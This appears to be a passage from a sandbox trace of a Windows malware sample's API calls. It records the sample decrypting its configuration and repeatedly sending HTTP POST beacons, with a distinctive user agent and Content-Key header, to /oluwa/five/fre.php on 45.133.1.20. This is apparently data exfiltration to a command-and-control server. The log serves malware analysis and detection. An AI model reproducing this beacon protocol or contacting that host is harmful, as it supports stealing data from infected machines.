application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0211.359] GetProcessHeap () returned 0x6a0000 [0211.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c9f28 [0211.359] GetProcessHeap () returned 0x6a0000 [0211.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0211.359] GetProcessHeap () returned 0x6a0000 [0211.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0211.359] GetProcessHeap () returned 0x6a0000 [0211.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c7f00 [0211.360] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0211.361] wvsprintfA (in: param_1=0x6c7f00, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0211.361] GetProcessHeap () returned 0x6a0000 [0211.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0211.361] GetProcessHeap () returned 0x6a0000 [0211.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0211.362] send (s=0x5cc, buf=0x6bd460*, len=242, flags=0) returned 242 [0211.362] send (s=0x5cc, buf=0x6bb998*, len=159, flags=0) returned 159 [0211.362] GetProcessHeap () returned 0x6a0000 [0211.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0211.362] recv (in: s=0x5cc, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0211.443] GetProcessHeap () returned 0x6a0000 [0211.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0211.444] GetProcessHeap () returned 0x6a0000 [0211.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0211.444] GetProcessHeap () returned 0x6a0000 [0211.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c9f28 | out: hHeap=0x6a0000) returned 1 [0211.444] GetProcessHeap () returned 0x6a0000 [0211.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0211.445] closesocket (s=0x5cc) returned 0 [0211.446] GetProcessHeap () returned 0x6a0000 [0211.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0211.446] GetProcessHeap () returned 0x6a0000 [0211.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0211.446] GetProcessHeap () returned 0x6a0000 [0211.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0211.447] GetProcessHeap () returned 0x6a0000 [0211.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0211.447] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb64) returned 0x5cc [0211.450] Sleep (dwMilliseconds=0xea60) [0211.467] GetProcessHeap () returned 0x6a0000 [0211.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0211.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.470] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.482] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0211.492] GetProcessHeap () returned 0x6a0000 [0211.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0211.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.493] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0211.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.494] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.506] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.506] GetProcessHeap () returned 0x6a0000 [0211.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0211.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.508] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0211.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.509] CryptDestroyKey (hKey=0x6ad020) returned 1 [0211.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.510] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0211.510] GetProcessHeap () returned 0x6a0000 [0211.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0211.510] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.511] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0211.511] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.514] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0211.514] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.515] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0211.515] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.516] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0211.516] GetProcessHeap () returned 0x6a0000 [0211.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0211.516] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0211.516] GetProcessHeap () returned 0x6a0000 [0211.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0211.517] GetProcessHeap () returned 0x6a0000 [0211.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0211.517] GetProcessHeap () returned 0x6a0000 [0211.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0211.517] GetProcessHeap () returned 0x6a0000 [0211.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0211.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.519] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.527] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0211.536] GetProcessHeap () returned 0x6a0000 [0211.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0211.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.537] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0211.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.539] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.540] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.540] GetProcessHeap () returned 0x6a0000 [0211.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0211.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.541] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0211.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.542] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0211.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.543] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0211.543] GetProcessHeap () returned 0x6a0000 [0211.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0211.547] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.547] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0211.548] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.548] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0211.549] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.549] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0211.550] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.550] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0211.550] GetProcessHeap () returned 0x6a0000 [0211.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0211.550] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0211.550] GetProcessHeap () returned 0x6a0000 [0211.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0211.550] socket (af=2, type=1, protocol=6) returned 0x5d0 [0211.550] connect (s=0x5d0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0211.579] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0211.579] GetProcessHeap () returned 0x6a0000 [0211.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0211.579] GetProcessHeap () returned 0x6a0000 [0211.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c7f00 [0211.580] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0211.581] wvsprintfA (in: param_1=0x6c7f00, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0211.581] GetProcessHeap () returned 0x6a0000 [0211.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c9f28 [0211.582] GetProcessHeap () returned 0x6a0000 [0211.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0211.584] GetProcessHeap () returned 0x6a0000 [0211.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0211.584] GetProcessHeap () returned 0x6a0000 [0211.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c7f00 [0211.584] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0211.585] wvsprintfA (in: param_1=0x6c7f00, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0211.585] GetProcessHeap () returned 0x6a0000 [0211.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0211.585] GetProcessHeap () returned 0x6a0000 [0211.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0211.586] send (s=0x5d0, buf=0x6bd460*, len=242, flags=0) returned 242 [0211.590] send (s=0x5d0, buf=0x6bb998*, len=159, flags=0) returned 159 [0211.590] GetProcessHeap () returned 0x6a0000 [0211.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0211.590] recv (in: s=0x5d0, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0211.665] GetProcessHeap () returned 0x6a0000 [0211.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0211.666] GetProcessHeap () returned 0x6a0000 [0211.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0211.666] GetProcessHeap () returned 0x6a0000 [0211.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c9f28 | out: hHeap=0x6a0000) returned 1 [0211.667] GetProcessHeap () returned 0x6a0000 [0211.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0211.667] closesocket (s=0x5d0) returned 0 [0211.668] GetProcessHeap () returned 0x6a0000 [0211.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0211.668] GetProcessHeap () returned 0x6a0000 [0211.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0211.668] GetProcessHeap () returned 0x6a0000 [0211.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0211.670] GetProcessHeap () returned 0x6a0000 [0211.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0211.671] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb6c) returned 0x5d0 [0211.673] Sleep (dwMilliseconds=0xea60) [0211.674] GetProcessHeap () returned 0x6a0000 [0211.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0211.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.675] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.684] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0211.695] GetProcessHeap () returned 0x6a0000 [0211.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0211.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.696] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0211.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.697] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.698] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.698] GetProcessHeap () returned 0x6a0000 [0211.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0211.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.700] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0211.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.701] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0211.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.702] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0211.702] GetProcessHeap () returned 0x6a0000 [0211.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0211.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.704] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0211.704] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.705] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0211.705] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.711] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0211.712] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.712] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0211.712] GetProcessHeap () returned 0x6a0000 [0211.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0211.712] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0211.712] GetProcessHeap () returned 0x6a0000 [0211.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0211.713] GetProcessHeap () returned 0x6a0000 [0211.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0211.716] GetProcessHeap () returned 0x6a0000 [0211.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0211.717] GetProcessHeap () returned 0x6a0000 [0211.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0211.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.718] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.728] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0211.737] GetProcessHeap () returned 0x6a0000 [0211.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0211.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.738] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0211.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.739] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.741] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.741] GetProcessHeap () returned 0x6a0000 [0211.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0211.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.742] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0211.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.743] CryptDestroyKey (hKey=0x6ad020) returned 1 [0211.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.744] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0211.744] GetProcessHeap () returned 0x6a0000 [0211.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0211.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.745] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0211.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.749] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0211.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.751] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0211.751] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.752] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0211.752] GetProcessHeap () returned 0x6a0000 [0211.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0211.752] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0211.752] GetProcessHeap () returned 0x6a0000 [0211.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0211.752] socket (af=2, type=1, protocol=6) returned 0x5d4 [0211.752] connect (s=0x5d4, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0211.777] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0211.777] GetProcessHeap () returned 0x6a0000 [0211.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0211.778] GetProcessHeap () returned 0x6a0000 [0211.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c7f00 [0211.778] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0211.779] wvsprintfA (in: param_1=0x6c7f00, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0211.779] GetProcessHeap () returned 0x6a0000 [0211.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c9f28 [0211.779] GetProcessHeap () returned 0x6a0000 [0211.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0211.780] GetProcessHeap () returned 0x6a0000 [0211.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0211.780] GetProcessHeap () returned 0x6a0000 [0211.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c7f00 [0211.781] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0211.782] wvsprintfA (in: param_1=0x6c7f00, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST 